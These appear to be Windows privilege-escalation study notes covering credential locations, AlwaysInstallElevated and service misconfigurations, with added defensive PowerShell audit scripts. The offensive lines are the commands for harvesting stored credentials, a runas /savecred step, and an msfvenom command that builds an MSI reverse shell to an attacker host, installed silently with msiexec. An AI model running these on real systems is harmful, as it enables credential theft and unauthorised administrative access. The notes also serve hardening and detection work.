Windows Privilege Escalation

Unattended Windows Installations

  • automated installation of Windows on a large number of hosts
  • the answer files used for setup are usually stored in one of
    • C:\Unattend.xml
    • C:\Windows\Panther\Unattend.xml
    • C:\Windows\Panther\Unattend\Unattend.xml
    • C:\Windows\system32\sysprep.inf
    • C:\Windows\system32\sysprep\sysprep.xml
    • credentials stored in <Credentials> ... </Credentials> blocks

PowerShell History

  • using cmd.exe, run type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
  • using PowerShell, run type $Env:userprofile\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Saved Windows Credentials

  • to list credentials saved for other users
    • cmdkey /list
  • to run cmd.exe with one of those saved credentials
    • runas /savecred /user:<username> cmd.exe

IIS Configuration

  • Internet Information Services (IIS)
  • default web server on Windows installations
  • passwords for databases or authentication could be stored in
    • C:\inetpub\wwwroot\web.config
    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
    • to quickly find database connection strings
      • type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString

Retrieve Credentials from Software: PuTTY

  • search the saved PuTTY sessions for the ProxyPassword registry value (stored proxy credentials)
    • reg query HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions\ /f "Proxy" /s
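
A combined check for the three credential sources above (unattended-installation answer files, IIS web.config connection strings and PuTTY ProxyPassword values) as a PowerShell audit script. This is an added example and not part of the original notes; it assumes the file and registry locations listed above and only reports where credentials remain so they can be removed.

```powershell
# Added example (not from the original notes): audit a host for leftover
# credentials in unattend files, IIS web.config files and PuTTY sessions.
# Run from an elevated PowerShell 5.1+ prompt; the paths are the ones listed above.

$unattendPaths = @(
    'C:\Unattend.xml',
    'C:\Windows\Panther\Unattend.xml',
    'C:\Windows\Panther\Unattend\Unattend.xml',
    'C:\Windows\system32\sysprep.inf',
    'C:\Windows\system32\sysprep\sysprep.xml'
)

$webConfigPaths = @(
    'C:\inetpub\wwwroot\web.config',
    'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config'
)

$findings = @()

# 1. Unattend / sysprep files: flag any file that still exists, and every
#    <Credentials> or <Password> element inside it (local-name() ignores the
#    unattend XML namespace).
foreach ($p in $unattendPaths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    $findings += [pscustomobject]@{ Source = 'Unattend'; Location = $p; Detail = 'file present' }
    if ($p -like '*.xml') {
        try {
            [xml]$doc = Get-Content -LiteralPath $p -Raw
            $nodes = $doc.SelectNodes('//*[local-name()="Credentials" or local-name()="Password"]')
            foreach ($n in $nodes) {
                $findings += [pscustomobject]@{ Source = 'Unattend'; Location = $p; Detail = "<$($n.LocalName)> element found" }
            }
        } catch {
            $findings += [pscustomobject]@{ Source = 'Unattend'; Location = $p; Detail = "not valid XML: $($_.Exception.Message)" }
        }
    } else {
        # sysprep.inf is INI-style: look for a password key.
        Select-String -LiteralPath $p -Pattern 'password\s*=' | ForEach-Object {
            $findings += [pscustomobject]@{ Source = 'Unattend'; Location = $p; Detail = "line $($_.LineNumber): password key" }
        }
    }
}

# 2. IIS web.config: report connection strings that embed a password.
foreach ($p in $webConfigPaths) {
    if (-not (Test-Path -LiteralPath $p)) { continue }
    Select-String -LiteralPath $p -Pattern 'connectionString=.*(password|pwd)\s*=' | ForEach-Object {
        $findings += [pscustomobject]@{ Source = 'IIS'; Location = $p; Detail = "line $($_.LineNumber): connection string with embedded password" }
    }
}

# 3. PuTTY: saved sessions that keep a proxy password in the registry.
$puttyKey = 'HKCU:\Software\SimonTatham\PuTTY\Sessions'
if (Test-Path $puttyKey) {
    Get-ChildItem $puttyKey | ForEach-Object {
        $pw = (Get-ItemProperty -Path $_.PSPath -Name ProxyPassword -ErrorAction SilentlyContinue).ProxyPassword
        if ($pw) {
            $findings += [pscustomobject]@{ Source = 'PuTTY'; Location = $_.PSChildName; Detail = 'ProxyPassword is set' }
        }
    }
}

if ($findings.Count -eq 0) { 'No stored-credential residue found.' } else { $findings | Format-Table -AutoSize }
```

Run it after provisioning and again periodically: the remediation is to delete answer files once setup has completed, to move connection strings into an encrypted configuration section (aspnet_regiis.exe -pe "connectionStrings" encrypts the section in place) and to clear proxy passwords from saved PuTTY sessions.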

Scheduled Tasks

  • the Windows equivalent of cron jobs
  • list scheduled tasks using schtasks
  • for detailed information about one task use schtasks /query /tn <taskname> /fo list /v
  • to check the file permissions of the task's executable use icacls

AlwaysInstallElevated

  • .msi files usually run with the privilege level of the user that runs them
  • can be configured to run with higher privileges from any user account
  • requires the AlwaysInstallElevated value to be set in both of these registry keys
    • reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer
    • reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer
  • if both are set, a malicious .msi file can be generated using msfvenom
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKING_10.10.244.190 LPORT=LOCAL_PORT -f msi -o malicious.msi
    • run using msiexec /quiet /qn /i C:\Windows\Temp\malicious.msi
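
To confirm whether the policy is actually in force (the value must be 1 under both hives; one hive alone is not enough) and to revert it, here is an added PowerShell check that is not part of the original notes. It assumes only the two registry keys queried above.

```powershell
# Added example (not from the original notes): report whether AlwaysInstallElevated
# is effective on this host and, optionally, turn it off.
# The policy is only in effect when the value is 1 under BOTH keys.

$keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AlwaysInstallElevatedState {
    foreach ($k in $keys) {
        $v = $null
        if (Test-Path $k) {
            $v = (Get-ItemProperty -Path $k -Name AlwaysInstallElevated -ErrorAction SilentlyContinue).AlwaysInstallElevated
        }
        # A missing key or value counts as "not enabled" for that hive.
        [pscustomobject]@{ Key = $k; Value = $v; Enabled = ($v -eq 1) }
    }
}

$state = @(Get-AlwaysInstallElevatedState)
$state | Format-Table -AutoSize

$effective = @($state | Where-Object { -not $_.Enabled }).Count -eq 0
if ($effective) {
    Write-Warning 'AlwaysInstallElevated is effective: any user can install MSI packages as SYSTEM.'
} else {
    'AlwaysInstallElevated is not effective on this host.'
}

# Remediation (requires administrator rights): set both values to 0 or delete them.
# Uncomment to apply. If the setting comes from Group Policy it will be re-applied
# at the next refresh, so fix the policy source as well.
# foreach ($k in $keys) {
#     if (-not (Test-Path $k)) { New-Item -Path $k -Force | Out-Null }
#     Set-ItemProperty -Path $k -Name AlwaysInstallElevated -Value 0 -Type DWord
# }
```

For detection, MSI installs are logged in the Application event log under the MsiInstaller source, so an install launched from a user-writable location such as C:\Windows\Temp on a host where the policy is enabled is worth alerting on.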

Abusing Service Misconfigurations

  • services are managed by the SCM (Service Control Manager)
  • inspect a service's configuration using sc qc <service name>

Insecure Permissions on Service Executable

  • if the service's executable has weak permissions
  • it can be replaced or modified

Unquoted Service Paths

  • when the path to the associated executable is not properly quoted to account for spaces

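
An added PowerShell audit (not from the original notes) covering both service misconfigurations above: it reads every service's binary path from Win32_Service, reports executables that Everyone, Users, Authenticated Users or INTERACTIVE can modify, and for unquoted paths containing spaces checks whether any of the intermediate directories Windows would search is writable by those principals. The list of low-privileged principals and the set of rights treated as "write" are assumptions; adjust them to the environment.

```powershell
# Added example (not from the original notes): audit services for a writable
# executable and for unquoted paths with writable intermediate directories.
# Run from an elevated PowerShell 5.1+ prompt.

# Principals that must never be able to modify a service binary (assumed list).
$lowPrivPrincipals = @('Everyone', 'BUILTIN\Users',
                       'NT AUTHORITY\Authenticated Users', 'NT AUTHORITY\INTERACTIVE')

# Rights that allow replacing or tampering with a file, or creating files in a
# directory (WriteData on a directory = create file). Generic bits are added
# because raw ACEs may carry GENERIC_WRITE / GENERIC_ALL instead.
$writeMask = [int][System.Security.AccessControl.FileSystemRights]'WriteData, Delete, ChangePermissions, TakeOwnership'
$writeMask = $writeMask -bor 0x40000000 -bor 0x10000000

function Test-LowPrivWrite {
    param([string]$Path)
    try { $acl = Get-Acl -LiteralPath $Path -ErrorAction Stop } catch { return $false }
    foreach ($ace in $acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        # Inherit-only ACEs (e.g. the default one on C:\) do not apply to the object itself.
        if (($ace.PropagationFlags -band [System.Security.AccessControl.PropagationFlags]::InheritOnly) -ne 0) { continue }
        if ($lowPrivPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $writeMask) -ne 0) { return $true }
    }
    return $false
}

function Get-ServiceExecutable {
    param([string]$PathName)
    if ([string]::IsNullOrWhiteSpace($PathName)) { return $null }
    if ($PathName.StartsWith('"')) { return $PathName.Split('"')[1] }
    # Unquoted: the binary ends at the first ".exe" token, the rest are arguments.
    if ($PathName -match '^(?<exe>.*?\.exe)(\s|$)') { return $Matches.exe }
    return $PathName.Split(' ')[0]
}

$findings = foreach ($svc in Get-CimInstance Win32_Service) {
    $exe = Get-ServiceExecutable $svc.PathName
    if (-not $exe) { continue }

    # Check 1: weak permissions on the service executable itself.
    if ((Test-Path -LiteralPath $exe) -and (Test-LowPrivWrite $exe)) {
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName;
                           Issue = 'executable writable by low-privileged principal'; Path = $exe }
    }

    # Check 2: unquoted path with spaces. Windows tries C:\Program.exe,
    # C:\Program Files\My.exe, ... before the real binary, so each directory
    # that would hold one of those candidates matters if it is writable.
    if ((-not $svc.PathName.StartsWith('"')) -and $exe.Contains(' ')) {
        $parts = $exe.Split(' ')
        $writableDirs = @()
        for ($i = 1; $i -lt $parts.Count; $i++) {
            $candidate = ($parts[0..($i - 1)] -join ' ')
            $dir = Split-Path -Parent $candidate
            if ($dir -and (Test-Path -LiteralPath $dir) -and (Test-LowPrivWrite $dir)) { $writableDirs += $dir }
        }
        if ($writableDirs) { $detail = "unquoted path, writable dir(s): $($writableDirs -join '; ')" }
        else { $detail = 'unquoted path (no writable intermediate directory found)' }
        [pscustomobject]@{ Service = $svc.Name; RunsAs = $svc.StartName; Issue = $detail; Path = $svc.PathName }
    }
}

if ($findings) { $findings | Format-Table -AutoSize -Wrap } else { 'No service path or permission issues found.' }
```

The fix for an unquoted path is to re-register the binary path with quotes (sc config <service name> binPath= "\"C:\path with spaces\svc.exe\"") and for a writable executable to reset its ACL so that only administrators and SYSTEM can modify it; services running as LocalSystem (the RunsAs column) deserve attention first.
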
Last modified 2023.10.27